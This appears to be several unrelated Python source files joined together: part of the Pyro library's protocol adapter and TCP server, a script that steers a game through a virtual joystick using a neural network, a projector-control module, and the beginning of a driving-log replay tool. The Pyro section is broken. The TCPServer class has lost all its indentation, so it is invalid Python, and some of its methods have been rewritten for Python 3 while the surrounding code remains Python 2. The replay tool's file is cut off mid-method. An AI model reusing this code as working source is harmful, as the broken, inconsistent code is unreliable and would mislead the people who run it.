                    # XXX the importerror sometimes doesn't contain the package :-(
                    name=ix.args[0][16:]
                    fromlist=None
                Log.msg('PYROAdapter','failed to import',name)
                self.returnException(conn, _InternalNoModuleError(name,fromlist),0)   # don't shutdown!
            else:
                Log.error('PYROAdapter','code problem with incoming object: '+str(ix))
                self.returnException(conn, NoModuleError(* ix.args))
        except Exception:
            daemon.handleError(conn)

    def returnException(self, conn, exc, shutdown=1, args=None):
        """Send an encapsulated exception back to the client; optionally close conn."""
        if conn.pflags&PFLG_XMLPICKLE_GNOSIS:
            pic=util.getXMLPickle('gnosis')
        else:
            pic=pickle
        try:
            body=pic.dumps(PyroExceptionCapsule(exc,args),Pyro.config.PYRO_PICKLE_FORMAT)
        except Exception,x:
            # hmm, pickling the exception failed... pickle the string instead
            body=pic.dumps(PyroExceptionCapsule(PyroError(str(x)),args),Pyro.config.PYRO_PICKLE_FORMAT)
        sock_sendmsg(conn.sock, self.createMsg(body),self.timeout)
        if shutdown:
            conn.close()

    def handleConnection(self, conn, tcpserver):
        """Server side: run the challenge/response handshake on a new connection.

        Returns 1 when the connection is accepted, 0 when denied or on
        protocol errors.
        """
        # Server-side connection stuff. Use auth code from tcpserver's validator.
        try:
            # Validate the connection source (host) immediately,
            # if it's ok, send authentication challenge, and read identification data to validate.
            (ok,reasonCode) = tcpserver.newConnValidator.acceptHost(tcpserver,conn)
            if ok:
                challenge=tcpserver.newConnValidator.createAuthChallenge(tcpserver,conn)
                if len(challenge)!=self.AUTH_CHALLENGE_SIZE:
                    raise ValueError("Auth challenge must be exactly "+`self.AUTH_CHALLENGE_SIZE`+" bytes")
                sock_sendmsg(conn.sock, self.createMsg(challenge),self.timeout)
                ver,body,pflags = self.receiveMsg(conn)
                if ver==self.version and body.startswith(self.connectMSG):
                    token=body[len(self.connectMSG):]
                    (ok,reasonCode) = tcpserver.newConnValidator.acceptIdentification(tcpserver,conn,token,challenge)
                    if ok:
                        self.sendAccept(conn)
                        conn.connected=1
                        return 1
                    else:
                        self.sendDeny(conn,reasonCode)
                else:
                    self.sendDeny(conn,reasonCode)
            return 0
        except ProtocolError:
            return 0
# import wrapper class to help with importing remote modules
# import wrapper class to help with importing remote modules
class agent_import:
    """Wrapper around __import__ that records the last requested module name.

    Installed temporarily in place of __builtin__.__import__ so that, when an
    ImportError occurs during mobile-code unpickling/execution, the missing
    module's name and fromlist can be recovered from this object.
    """
    def __init__(self, orig_import):
        self.orig_import = orig_import   # the real __import__ to delegate to

    def __call__(self, name, globals=None, locals=None, fromlist=None):
        # NOTE: the original used mutable default arguments (globals={},
        # locals={}), a classic Python pitfall; None sentinels are used
        # instead and substituted at call time.
        # save the import details for later inspection:
        self.name = name         # note: this must be a str object
        self.fromlist = fromlist
        return self.orig_import(name,
                                globals if globals is not None else {},
                                locals if locals is not None else {},
                                fromlist)
#
# The SSL adapter that handles SSL connections instead of regular sockets.
#
class PYROSSLAdapter(PYROAdapter):
    """PYROAdapter variant that runs the wire protocol over M2Crypto SSL sockets."""
    def __init__(self):
        PYROAdapter.__init__(self)
        try:
            from M2Crypto import SSL
        except ImportError:
            raise ProtocolError('SSL not available')
        # Build the client-side SSL context from the configured certificate files.
        self.ctx = SSL.Context('sslv23')
        self.ctx.load_cert(os.path.join(Pyro.config.PYROSSL_CERTDIR, Pyro.config.PYROSSL_CLIENT_CERT))
        self.ctx.load_client_ca(os.path.join(Pyro.config.PYROSSL_CERTDIR, Pyro.config.PYROSSL_CA_CERT))
        self.ctx.load_verify_info(os.path.join(Pyro.config.PYROSSL_CERTDIR, Pyro.config.PYROSSL_CA_CERT))
        # require a peer certificate; depth limit 10
        self.ctx.set_verify(SSL.verify_peer | SSL.verify_fail_if_no_peer_cert,10)
        self.ctx.set_allow_unknown_ca(1)
        Log.msg('PYROSSLAdapter','SSL Context initialized')

    def setTimeout(self, timeout):
        PYROAdapter.setTimeout(self, timeout)

    def bindToURI(self,URI):
        """Connect over SSL to the Pyro object referenced by URI (client side)."""
        if URI.protocol not in ('PYROSSL','PYROLOCSSL'):
            Log.error('PYROSSLAdapter','incompatible protocol in URI:',URI.protocol)
            raise ProtocolError('incompatible protocol in URI')
        try:
            from M2Crypto import SSL
            self.URI=URI.clone()
            # wrap a plain TCP socket in an SSL connection using our context
            sock = SSL.Connection(self.ctx,socket.socket(socket.AF_INET, socket.SOCK_STREAM))
            sock.connect((URI.address, URI.port))
            conn=TCPConnection(sock, sock.getpeername())
            # receive the authentication challenge string, and use that to build the actual identification string.
            authChallenge=self.recvAuthChallenge(conn)
            # reply with our ident token, generated from the ident passphrase and the challenge
            msg = self._sendConnect(sock,self.newConnValidator.createAuthToken(self.ident, authChallenge, conn.addr, self.URI, None) )
            if msg==self.acceptMSG:
                self.conn=conn
                self.conn.connected=1
                Log.msg('PYROSSLAdapter','connected to',str(URI))
                if URI.protocol=='PYROLOCSSL':
                    self.resolvePYROLOC_URI("PYROSSL")   # updates self.URI
            elif msg[:len(self.denyMSG)]==self.denyMSG:
                try:
                    raise ConnectionDeniedError(constants.deniedReasons[int(msg[-1])])
                except (KeyError,ValueError):
                    raise ConnectionDeniedError('invalid response')
        except socket.error:
            Log.msg('PYROSSLAdapter','connection failed to URI',str(URI))
            raise ProtocolError('connection failed')

    def _sendConnect(self, sock, ident):
        # same handshake as the plain adapter; kept as an override point
        return PYROAdapter._sendConnect(self, sock, ident)
def getProtocolAdapter(protocol):
    """Factory: return a fresh protocol adapter for the given protocol name."""
    if protocol in ('PYRO', 'PYROLOC'):
        return PYROAdapter()
    if protocol in ('PYROSSL', 'PYROLOCSSL'):
        return PYROSSLAdapter()
    # anything else is not a protocol we speak
    Log.error('getProtocolAdapter','unsupported protocol:',protocol)
    raise ProtocolError('unsupported protocol')
#-------- TCPConnection object for TCPServer class
class TCPConnection:
    """Wrapper around an accepted TCP socket plus per-connection protocol state."""

    def __init__(self, sock, addr):
        self.sock = sock
        set_sock_keepalive(self.sock)   # enable tcp/ip keepalive on this socket
        self.addr = addr
        self.connected = 0   # handshake completed?
        self.pflags = 0      # protocol flags seen on this connection

    def __del__(self):
        self.close()

    def fileno(self):
        # delegate so this object can be passed straight to select()
        return self.sock.fileno()

    def close(self):
        self.sock.close()
        self.connected = 0

    def shutdown(self):
        self.sock.shutdown(2)   # no further send/receives

    def __str__(self):
        return 'TCPConnection with %s connected=%s' % (self.addr, self.connected)
#-------- The New Connection Validators:
#-------- DefaultConnValidator checks max number of connections & identification
#-------- and ident check is done using hmac-md5 secure hash of passphrase+challenge.
#-------- Contains client- & server-side auth code.
class DefaultConnValidator:
    """Default connection validator: limits connection count and checks the
    client identification using an hmac-md5 hash of passphrase+challenge.
    Contains both the client- and server-side auth code."""
    def __init__(self):
        self.setAllowedIdentifications(None)   # default=accept all (None means all!)
    def acceptHost(self,daemon,connection):
        # refuse new connections once the server is at its configured maximum
        if len(daemon.connections)>=Pyro.config.PYRO_MAXCONNECTIONS:
            Log.msg('DefaultConnValidator','Too many open connections, closing',connection,'#conns=',len(daemon.connections))
            return (0, constants.DENIED_SERVERTOOBUSY)
        return (1,0)
    def acceptIdentification(self, daemon, connection, token, challenge):
        # compare the client's token against each allowed identification;
        # "all" is the sentinel meaning no identification check at all
        if "all" in self.allowedIDs:
            return (1,0)
        for authid in self.allowedIDs[:]:
            if self.createAuthToken(authid, challenge, connection.addr, None, daemon) == token:
                return (1,0)
        Log.warn('DefaultConnValidator','connect authentication failed on conn ',connection)
        return (0,constants.DENIED_SECURITY)
    def createAuthToken(self, authid, challenge, peeraddr, URI, daemon):
        # Called from both client and server, is used to be able to validate the token.
        #   client: URI & peeraddr provided, daemon is None
        #   server: URI is None, peeraddr and daemon provided.
        # Return hmac-md5 secure hash of our authentication phrase & the challenge.
        return hmac.new(challenge, authid).digest()
    def createAuthChallenge(self, tcpserver, conn):
        # Server-side only, when new connection comes in.
        # Challenge is secure hash of: server IP, process ID, timestamp, random value
        # (NOTE: MUST RETURN EXACTLY AUTH_CHALLENGE_SIZE(=16) BYTES!)
        try:
            pid=os.getpid()
        except:
            pid=id(self)   # XXX jython has no getpid()
        string = '%s-%d-%.20f-%.20f' %(str(getIPAddress()), pid, time.time(), random.random())
        return md5.new(string).digest()
    def mungeIdent(self, ident):
        # munge the identification string into something else that's
        # not easily guessed or recognised, like the md5 hash:
        return md5.new(ident).digest()
    def setAllowedIdentifications(self, ids):
        # ids: list/tuple of plaintext passphrases, or None to accept everyone
        if ids is not None:
            if type(ids) in (types.TupleType, types.ListType):
                self.allowedIDs=map(self.mungeIdent, ids)   # don't store ids themselves
            else:
                raise TypeError("ids must be a list")
        else:
            self.allowedIDs=["all"]   # trick: allow all incoming authentications.
#-------- basic SSL connection validator, a specialized default validator.
class BasicSSLValidator(DefaultConnValidator):
    """Connection validator that additionally requires a peer SSL certificate."""

    def __init__(self):
        DefaultConnValidator.__init__(self)

    def acceptHost(self, daemon, connection):
        ok, code = DefaultConnValidator.acceptHost(self, daemon, connection)
        if not ok:
            return (ok, code)
        # host passed the base checks -- now inspect the peer's certificate
        peercert = connection.sock.get_peer_cert()
        return self.checkCertificate(peercert)

    def checkCertificate(self, cert):
        # do something interesting with the cert here, in a subclass :)
        if cert is None:
            return (0, constants.DENIED_SECURITY)
        return (1, 0)
#-------- Helper class for local storage.
class LocalStorage:
    """Per-"thread" state holder, used when real thread-local storage is
    unavailable (i.e. when the server runs in single-threaded mode)."""
    def __init__(self):
        self.caller = None   # the connection currently being serviced
#-------- TCPServer base class
class TCPServer:
def __init__(self, port, host='', threaded=_has_threading,prtcol='PYRO'):
self._ssl_server = 0
self.connections = [] # connection threads
self.initTLS=lambda tls: None # default do-nothing func
try:
if os.name=='java':
raise NotImplementedError('Pyro server not yet supported on Jython') # XXX
if prtcol=='PYROSSL':
try:
from M2Crypto import SSL
except ImportError:
raise ProtocolError('SSL not available')
try:
self.ctx = SSL.Context('sslv23')
self.ctx.load_cert(os.path.join(Pyro.config.PYROSSL_CERTDIR, Pyro.config.PYROSSL_SERVER_CERT))
self.ctx.load_client_ca(os.path.join(Pyro.config.PYROSSL_CERTDIR, Pyro.config.PYROSSL_CA_CERT))
self.ctx.load_verify_info(os.path.join(Pyro.config.PYROSSL_CERTDIR, Pyro.config.PYROSSL_CA_CERT))
self.ctx.set_verify(SSL.verify_peer | SSL.verify_fail_if_no_peer_cert,10)
self.ctx.set_allow_unknown_ca(1)
self._ssl_server = 1
Log.msg('TCPServer','SSL Context initialized')
except:
Log.warn('TCPServer','SSL Context could not be initialized !!!')
self.setNewConnectionValidator(BasicSSLValidator())
else:
self.setNewConnectionValidator(DefaultConnValidator())
# create server socket for new connections
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
set_reuse_addr(self.sock)
self.sock.bind((host,port))
self.sock.listen(Pyro.config.PYRO_TCP_LISTEN_BACKLOG)
# rest of members
self.threaded = threaded
self.mustShutdown=0 # global shutdown
self.localStorage=LocalStorage() # TLS for systems that don't have threads
return
except socket.error,msg:
raise ProtocolError(msg)
Log.msg('TCPServer','initialized')
def __del__(self):
self.closedown(nolog=1)
def setInitTLS(self, initTLS):
if not callable(initTLS):
raise TypeError("initTLS must be callable object")
self.initTLS=initTLS
# if in single thread mode, (re-)init the TLS right away.
if not Pyro.config.PYRO_MULTITHREADED:
self.initTLS(self.localStorage)
def closedown(self, nolog=0):
# explicit closedown request
if len(self.connections)>0:
if not nolog:
Log.warn('TCPServer','Shutting down but there are still',len(self.connections),'active connections')
for c in self.connections[:]:
if isinstance(c,TCPConnection):
c.close()
if isinstance(c,Thread):
c.join()
self.connections=[]
if hasattr(self,'sock'):
self.sock.close()
del self.sock
def setNewConnectionValidator(self,validator):
if not isinstance(validator, DefaultConnValidator):
raise TypeError("validator must be specialization of DefaultConnValidator")
self.newConnValidator=validator
def getNewConnectionValidator(self):
return self.newConnValidator
def connectionHandler(self, conn):
# Handle the connection and all requests that arrive on it.
# This is only called in multithreading mode.
try:
if self.getAdapter().handleConnection(conn, self):
Log.msg('TCPServer','new connection ',conn, ' #conns=',len(self.connections))
while not self.mustShutdown:
try:
if not conn.connected:
# connection has been closed in the meantime!
raise ConnectionClosedError()
ins,outs,exs=safe_select([conn],[],[],2)
if conn in ins or conn in exs:
self.handleInvocation(conn)
except ConnectionClosedError:
# client went away. Exit immediately
self.removeConnection(conn)
return
except (PyroExceptionCapsule, Exception):
self.handleError(conn)
else:
# log entry has already been written by newConnValidator
self.removeConnection(conn)
finally:
# exiting thread.
self._removeFromConnectionList(None)
def _removeFromConnectionList(self, obj):
if self.threaded and currentThread:
obj=currentThread()
try:
self.connections.remove(obj)
except ValueError:
pass
# this is the preferred way of dealing with the request loop.
def requestLoop(self, condition=lambda:1, timeout=3, others=[], callback=None):
while condition() and not self.mustShutdown:
self.handleRequests(timeout,others,callback)
def handleRequests(self, timeout=None, others=[], callback=None):
if others and not callback:
raise ProtocolError('callback required')
if self.threaded:
self._handleRequest_Threaded(timeout,others,callback)
else:
self._handleRequest_NoThreads(timeout,others,callback)
def _handleRequest_NoThreads(self,timeout,others,callback):
# self.connections is used to keep track of TCPConnections
socklist = self.connections+[self.sock]+others
ins,outs,exs = safe_select(socklist,[],[],timeout)
if self.sock in ins:
# it was the server socket, new incoming connection
ins.remove(self.sock)
if self._ssl_server:
from M2Crypto import SSL
try:
csock, addr = self.sock.accept()
sslsock = SSL.Connection(self.ctx,csock)
sslsock.setup_addr(addr)
sslsock.setup_ssl()
sslsock.set_accept_state()
sslsock.accept_ssl()
except SSL.SSLError,error:
if str(error) in('unexpected eof', 'http request', 'tlsv1 alert unknown ca', 'peer did not return a certificate'):
return
else:
raise
csock=sslsock
else:
csock, addr = self.sock.accept()
conn=TCPConnection(csock,addr)
if self.getAdapter().handleConnection(conn, self):
Log.msg('TCPServer','new connection ',conn, ' #conns=',len(self.connections))
self.connections.append(conn)
else:
# connection denied, log entry has already been written by newConnValidator
self.removeConnection(conn)
for c in ins[0:]:
if isinstance(c,TCPConnection):
ins.remove(c)
try:
self.handleInvocation(c)
if not c.connected:
self.removeConnection(c)
except ConnectionClosedError:
# client went away.
self.removeConnection(c)
except:
self.handleError(c)
if ins and callback:
# the 'others' must have fired...
callback(ins)
# def handleInvocation(self, conn): .... abstract method (implemented in subclass)
def _handleRequest_Threaded(self,timeout,others,callback):
# self.connections is used to keep track of connection Threads
socklist = [self.sock]+others
ins,outs,exs = safe_select(socklist,[],[],timeout)
if self.sock in ins:
# it was the server socket, new incoming connection
if self._ssl_server:
from M2Crypto import SSL
try:
csock, addr = self.sock.accept()
sslsock = SSL.Connection(self.ctx,csock)
sslsock.setup_addr(addr)
sslsock.setup_ssl()
sslsock.set_accept_state()
sslsock.accept_ssl()
except SSL.SSLError,error:
Log.warn('TCPServer','SSL error: '+str(error))
# print "SSL Error:",error
csock.close()
return
csock=sslsock
else:
csock, addr = self.sock.accept()
conn=TCPConnection(csock,addr)
thread=Thread(target=self.connectionHandler, args=(conn,))
thread.setDaemon(1) # thread must exit at program termination.
thread.localStorage=LocalStorage()
self.initTLS(thread.localStorage)
self.connections.append(thread)
thread.start()
elif callback:
# the 'others' must have fired...
callback(ins)
def getLocalStorage(self):
# return storage object for this thread.
if self.threaded:
return currentThread().localStorage
else:
return self.localStorage
# to be called if a dropped connection is detected:
def removeConnection(self, conn):
conn.close()
self._removeFromConnectionList(conn)
Log.msg('TCPServer','removed connection ',conn,' #conns=',len(self.connections))
# to be called to stop all connections and shut down.
def shutdown(self):
self.mustShutdown=1
def getAdapter(self):
raise NotImplementedError,'must be overridden to return protocol adapter'
def handleError(self,conn):
    """Handle an error raised while serving `conn`.

    Abstract: subclasses must override. Uses the call-style raise
    (``raise E(msg)``), valid on both Python 2 and 3, instead of the
    Python-2-only ``raise E, msg`` form.
    """
    raise NotImplementedError('must be overridden')
def getServerSockets(self):
    """Return every socket select() should watch for this server.

    Threaded mode: only the listening socket (each connection thread owns
    its own client socket). Non-threaded mode: all client sockets plus the
    listening socket. The list comprehension replaces ``map(...)+[...]``,
    which breaks on Python 3 where map() returns a lazy iterator that
    cannot be concatenated to a list; behaviour on Python 2 is identical.
    """
    if self.threaded:
        return [self.sock]
    return [conn.sock for conn in self.connections]+[self.sock]
# Sometimes safe_select() raises an select.error exception with the EINTR
# errno flag set, which basically tells the caller to try again later.
# This safe_select method works around this case and indeed just tries again.
def safe_select(r,w,e,timeout=None):
    """select.select() wrapper that retries when interrupted by a signal.

    EINTR (or WSAEINTR on Windows) means "interrupted, try again", so the
    select is simply re-issued; any other error propagates. The
    Python-2-only ``except E, x`` syntax was replaced with
    ``except E as x``, which is valid on Python 2.6+ and Python 3.
    """
    while True:
        try:
            if timeout is not None:
                return select.select(r,w,e,timeout)
            else:
                return select.select(r,w,e)
        except select.error as x:
            # Interrupted system call: retry; anything else is re-raised.
            if x.args[0] == errno.EINTR or (hasattr(errno, 'WSAEINTR') and x.args[0] == errno.WSAEINTR):
                pass
            else:
                raise
|
gamepad.py | import numpy as np
import cv2
from mss import mss
from PIL import Image
from skimage.transform import resize
from skimage.io import imread
import math
import pyvjoy
from threading import Thread
from inputs import get_gamepad
from inputs import devices
import time
from train import create_model
def resize_image(img):
    """Scale `img` to 120x160 RGB and return it shaped (120, 160, 3)."""
    scaled = resize(img, (120, 160, 3))
    return scaled.reshape((120, 160, 3))
# Screen-capture region (pixels) passed to mss.grab().
coords = {'top': 34, 'left':3, 'width':640, 'height':480}
sct = mss()
# Colour tuples used by the (commented-out) cv2 debug overlay below.
white = (255, 255, 255)
orange = (0, 140, 255)
black = (0, 0, 0)
# Overlay geometry.
width = 640
height = 480
radius = 80
# Virtual joystick that receives either manual or predicted steering.
j = pyvjoy.VJoyDevice(2)
MAX_VJOY = 32767  # full-scale value written to the vJoy axes
MAX_JOY_VAL = math.pow(2, 15)  # full-scale value reported by the gamepad
# Latest stick position from the physical gamepad (normalised).
joy_x = 0
joy_y = 0
# Control flags toggled from the gamepad thread.
manual = False
recording = False
working = True
def gamepadThread():
    """Poll the physical gamepad and mirror its state into the globals.

    Updates joy_x / joy_y with the normalised stick position, toggles
    `manual` on the left bumper, and clears `working` on the select
    button. Fix: the loop now terminates once `working` is cleared —
    previously it was `while True`, so this non-daemon thread kept
    running after BTN_SELECT and the process could never exit.
    """
    global joy_x
    global joy_y
    global manual
    global recording
    global working
    while working:
        events = get_gamepad()  # blocks until at least one event arrives
        for event in events:
            if (event.code == 'ABS_Y'):
                joy_y = event.state / MAX_JOY_VAL
            if (event.code == 'ABS_X'):
                joy_x = event.state / MAX_JOY_VAL
            if (event.code == 'BTN_TL' and event.state == True):
                manual = not manual
                state = ("off", "on")[manual]
                print('Toggled manual ' + state)
            if (event.code == 'BTN_SELECT' and event.state == True):
                print('Escaping loop')
                working = False
                break  # stop processing events and let the thread exit
# Start mirroring the physical gamepad in the background.
captureGamepad = Thread(target = gamepadThread)
captureGamepad.start()
def pingpongThread():
    """Flip `manual` once a second (alternate manual/model control)."""
    global manual
    while True:
        time.sleep(1)
        manual = not manual
# Optional alternating-control experiment; disabled by default.
#pingpongLearning = Thread(target = pingpongThread)
#pingpongLearning.start()
# Build the network (no dropout at inference) and restore trained weights.
model = create_model(keep_prob=1)
model.load_weights('model_weights.h5')
# Joystick values actually sent to vJoy each frame.
final_x = 0
final_y = 0
# Training-data log (image path; x; y per line), appended across runs.
outfile = open('data/inputs.csv', 'a')
frame = 0
# Main capture -> predict -> steer loop; runs until `working` is cleared
# from the gamepad thread or 'q' is pressed in the cv2 window.
while working:
    # Grab the screen region and downscale to the network's input size.
    sct_img = sct.grab(coords)
    img_bgr = Image.frombytes('RGB', (sct_img.size.width, sct_img.size.height), sct_img.rgb)
    img_rgb = cv2.cvtColor(np.array(img_bgr), cv2.COLOR_RGB2BGR)
    small = cv2.resize(np.array(img_rgb), (160, 120), interpolation = cv2.INTER_AREA)
    resized = resize_image(small)
    vec = np.expand_dims(resized, axis=0)
    prediction = model.predict(vec, batch_size=1)[0]
    circle_x = prediction[0]
    circle_y = prediction[1]
    ball_color = white
    if (manual == True):
        # Human override: pass the physical stick straight through.
        final_x = joy_x
        final_y = joy_y
        ball_color = orange
    else:
        # Model control; y damped to 75% — presumably to soften the
        # vertical axis command (TODO confirm intent).
        final_x = circle_x
        final_y = circle_y * 0.75
    # Map stick space onto vJoy's [0, MAX_VJOY] axis range (y inverted).
    j.data.wAxisX = int(((final_x / 2) + 0.5) * MAX_VJOY)
    j.data.wAxisY = int(((-final_y / 2) + 0.5) * MAX_VJOY)
    j.update()
    # NOTE(review): dead branch — the `recording` flag was probably meant
    # here instead of the hard-coded False; as written no frames are saved.
    if False:
        adress = "data/h" + str(frame) + ".png"
        cv2.imwrite(adress, small)
        outfile.write(adress + ';' + str(final_x) + ';' + str(final_y) + '\n')
        frame += 1
    # Debug overlay (disabled): draw the commanded stick position.
    #big = cv2.resize(resized, (int(width), int(height)), interpolation = cv2.INTER_AREA)
    #ball = (int(width/2 + (final_x * radius)), int(height/2 - (final_y * radius)))
    #final = cv2.line(big, (int(width/2), int(height/2)), ball, black, 5)
    #final = cv2.circle(final, ball, 20, ball_color, -1)
    #cv2.imshow('test', final)
    if cv2.waitKey(25) & 0xFF == ord('q'):
        cv2.destroyAllWindows()
        break
outfile.close()
|
constellation_projector.py | # Standard imports
import datetime
import logging
import os
import threading
# Constellation imports
import config
import projector_control
class Projector:
    """Holds basic data about a projector and polls/commands it."""

    def __init__(self, id_, ip, connection_type, mac_address=None, make=None, password=None):
        self.id = id_
        self.type = "PROJECTOR"
        self.ip = ip  # IP address of the projector
        self.password = password  # Password to access PJLink
        self.mac_address = mac_address  # For use with Wake on LAN
        self.connection_type = connection_type  # 'pjlink' or 'serial'
        self.make = make  # manufacturer; selects the serial command set
        self.config = {"allowed_actions": ["power_on", "power_off"],
                       "description": config.componentDescriptions.get(id_, "")}
        self.state = {"status": "OFFLINE"}
        # Seeded far in the past so a failing first update marks us OFFLINE.
        self.last_contact_datetime = datetime.datetime(2020, 1, 1)
        self.update(full=True)

    def seconds_since_last_contact(self) -> float:
        """Calculate the number of seconds since the component last checked in."""
        diff = datetime.datetime.now() - self.last_contact_datetime
        return diff.total_seconds()

    def update(self, full=False):
        """Contact the projector to get the latest state.

        With full=True also query static details (the model name). A
        failure only marks the projector OFFLINE once it has been
        unreachable for more than 60 seconds.
        """
        error = False
        try:
            if self.connection_type == 'pjlink':
                connection = projector_control.pjlink_connect(self.ip, password=self.password)
                if full:
                    self.state["model"] = projector_control.pjlink_send_command(connection, "get_model")
                self.state["power_state"] = projector_control.pjlink_send_command(connection, "power_state")
                self.state["lamp_status"] = projector_control.pjlink_send_command(connection, "lamp_status")
                self.state["error_status"] = projector_control.pjlink_send_command(connection, "error_status")
            elif self.connection_type == "serial":
                connection = projector_control.serial_connect_with_url(self.ip, make=self.make)
                if full:
                    self.state["model"] = projector_control.serial_send_command(connection, "get_model", make=self.make)
                self.state["power_state"] = projector_control.serial_send_command(connection, "power_state",
                                                                                  make=self.make)
                self.state["lamp_status"] = projector_control.serial_send_command(connection, "lamp_status",
                                                                                  make=self.make)
                self.state["error_status"] = projector_control.serial_send_command(connection, "error_status",
                                                                                   make=self.make)
            self.last_contact_datetime = datetime.datetime.now()
        except Exception:
            # Unreachable or protocol error; handled by the grace period below.
            error = True
        if error and (self.seconds_since_last_contact() > 60):
            self.state = {"status": "OFFLINE"}
        else:
            # .get() avoids a KeyError when power_state has never been
            # fetched (e.g. unknown connection_type or an early failure).
            if self.state.get("power_state") == "on":
                self.state["status"] = "ONLINE"
            else:
                self.state["status"] = "STANDBY"

    def queue_command(self, cmd):
        """Function to spawn a thread that sends a command to the projector.

        Named "queue_command" to match what is used for exhibitComponents
        """
        print(f"Queuing command {cmd} for {self.id}")
        thread_ = threading.Thread(target=self.send_command, args=[cmd])
        thread_.daemon = True
        thread_.start()

    def send_command(self, cmd):
        """Connect to a PJLink projector and send a command"""
        # Translate commands for projector_control; unknown commands are
        # passed through unchanged.
        cmd_dict = {
            "shutdown": "power_off",
            "sleepDisplay": "power_off",
            "wakeDisplay": "power_on"
        }
        try:
            if self.connection_type == "pjlink":
                connection = projector_control.pjlink_connect(self.ip, password=self.password)
                projector_control.pjlink_send_command(connection, cmd_dict.get(cmd, cmd))
            elif self.connection_type == "serial":
                connection = projector_control.serial_connect_with_url(self.ip, make=self.make)
                projector_control.serial_send_command(connection, cmd_dict.get(cmd, cmd), make=self.make)
        except Exception as e:
            print(e)
def get_projector(this_id) -> Projector:
    """Return a projector with the given id, or None if no such projector exists"""
    for projector in config.projectorList:
        if projector.id == this_id:
            return projector
    return None
def poll_projectors():
    """Ask each projector to send a status update at an interval.
    """
    # Each update runs in its own daemon thread so one slow/offline
    # projector cannot stall the others.
    for projector in config.projectorList:
        new_thread = threading.Thread(target=projector.update)
        new_thread.daemon = True  # So it dies if we exit
        new_thread.start()
    # Reschedule ourselves every 30 s; the Timer handle is kept so it can
    # be cancelled at shutdown.
    config.polling_thread_dict["poll_projectors"] = threading.Timer(30, poll_projectors)
    config.polling_thread_dict["poll_projectors"].start()
# Set up log file
# All module-level logging goes to control_server.log next to the app.
log_path = os.path.join(config.APP_PATH, "control_server.log")
logging.basicConfig(datefmt='%Y-%m-%d %H:%M:%S',
                    filename=log_path,
                    format='%(levelname)s, %(asctime)s, %(message)s',
                    level=logging.DEBUG)
|
unlogger.py | #!/usr/bin/env python3
import argparse
import os
import sys
import zmq
import time
import signal
import multiprocessing
from uuid import uuid4
from collections import namedtuple
from collections import deque
from datetime import datetime
from cereal import log as capnp_log
from cereal.services import service_list
from cereal.messaging import pub_sock, MultiplePublishersError
from cereal.visionipc.visionipc_pyx import VisionIpcServer, VisionStreamType # pylint: disable=no-name-in-module, import-error
from common import realtime
from common.transformations.camera import eon_f_frame_size, tici_f_frame_size
from tools.lib.kbhit import KBHit
from tools.lib.logreader import MultiLogIterator
from tools.lib.route import Route
from tools.lib.route_framereader import RouteFrameReader
# Commands.
# Control messages sent from the UI/keyboard into the worker processes.
SetRoute = namedtuple("SetRoute", ("name", "start_time", "data_dir"))
SeekAbsoluteTime = namedtuple("SeekAbsoluteTime", ("secs",))
SeekRelativeTime = namedtuple("SeekRelativeTime", ("secs",))
TogglePause = namedtuple("TogglePause", ())
StopAndQuit = namedtuple("StopAndQuit", ())
# Pseudo message type used for raw camera frames sent over visionipc.
VIPC_TYP = "vipc"
class UnloggerWorker(object):
    """Log-reading worker: streams logged messages for a route to the
    control thread over a zmq PUSH socket, reading ahead for throughput."""

    def __init__(self):
        # Lazily created per-route camera frame reader.
        self._frame_reader = None
        self._cookie = None
        # Readahead buffer of (typ, msg, route_time, cookie) tuples.
        self._readahead = deque()

    def run(self, commands_address, data_address, pub_types):
        """Main loop: apply pending commands, read logs ahead, push them out."""
        # Fresh zmq context: this runs in a forked multiprocessing child.
        zmq.Context._instance = None
        commands_socket = zmq.Context.instance().socket(zmq.PULL)
        commands_socket.connect(commands_address)
        data_socket = zmq.Context.instance().socket(zmq.PUSH)
        data_socket.connect(data_address)
        poller = zmq.Poller()
        poller.register(commands_socket, zmq.POLLIN)
        # We can't publish frames without roadEncodeIdx, so add when it's missing.
        if "roadCameraState" in pub_types:
            pub_types["roadEncodeIdx"] = None
        # gc.set_debug(gc.DEBUG_LEAK | gc.DEBUG_OBJECTS | gc.DEBUG_STATS | gc.DEBUG_SAVEALL |
        # gc.DEBUG_UNCOLLECTABLE)
        # TODO: WARNING pycapnp leaks memory all over the place after unlogger runs for a while, gc
        # pauses become huge because there are so many tracked objects solution will be to switch to new
        # cython capnp
        try:
            route = None
            while True:
                # Drain all pending commands; block here until a route is set.
                while poller.poll(0.) or route is None:
                    cookie, cmd = commands_socket.recv_pyobj()
                    route = self._process_commands(cmd, route, pub_types)
                # **** get message ****
                self._read_logs(cookie, pub_types)
                self._send_logs(data_socket)
        finally:
            if self._frame_reader is not None:
                self._frame_reader.close()
            data_socket.close()
            commands_socket.close()

    def _read_logs(self, cookie, pub_types):
        """Fill the readahead deque (up to 1000 messages) from the iterator."""
        fullHEVC = capnp_log.EncodeIndex.Type.fullHEVC
        lr = self._lr
        while len(self._readahead) < 1000:
            route_time = lr.tell()
            msg = next(lr)
            typ = msg.which()
            if typ not in pub_types:
                continue
            # **** special case certain message types ****
            if typ == "roadEncodeIdx" and msg.roadEncodeIdx.type == fullHEVC:
                # this assumes the roadEncodeIdx always comes before the frame
                self._frame_id_lookup[
                    msg.roadEncodeIdx.frameId] = msg.roadEncodeIdx.segmentNum, msg.roadEncodeIdx.segmentId
                #print "encode", msg.roadEncodeIdx.frameId, len(self._readahead), route_time
            self._readahead.appendleft((typ, msg, route_time, cookie))

    def _send_logs(self, data_socket):
        """Drain the readahead down to 500 messages, attaching camera frames."""
        while len(self._readahead) > 500:
            typ, msg, route_time, cookie = self._readahead.pop()
            smsg = msg.as_builder()
            if typ == "roadCameraState":
                frame_id = msg.roadCameraState.frameId
                # Frame exists, make sure we have a framereader.
                # load the frame readers as needed
                s1 = time.time()
                try:
                    img = self._frame_reader.get(frame_id, pix_fmt="rgb24")
                except Exception:
                    img = None
                fr_time = time.time() - s1
                if fr_time > 0.05:
                    print("FRAME(%d) LAG -- %.2f ms" % (frame_id, fr_time*1000.0))
                if img is not None:
                    img = img[:, :, ::-1]  # Convert RGB to BGR, which is what the camera outputs
                    img = img.flatten()
                    bts = img.tobytes()
                    smsg.roadCameraState.image = bts
                    extra = (smsg.roadCameraState.frameId, smsg.roadCameraState.timestampSof, smsg.roadCameraState.timestampEof)
                    # Raw frame goes out as a separate VIPC pseudo-message.
                    data_socket.send_pyobj((cookie, VIPC_TYP, msg.logMonoTime, route_time, extra), flags=zmq.SNDMORE)
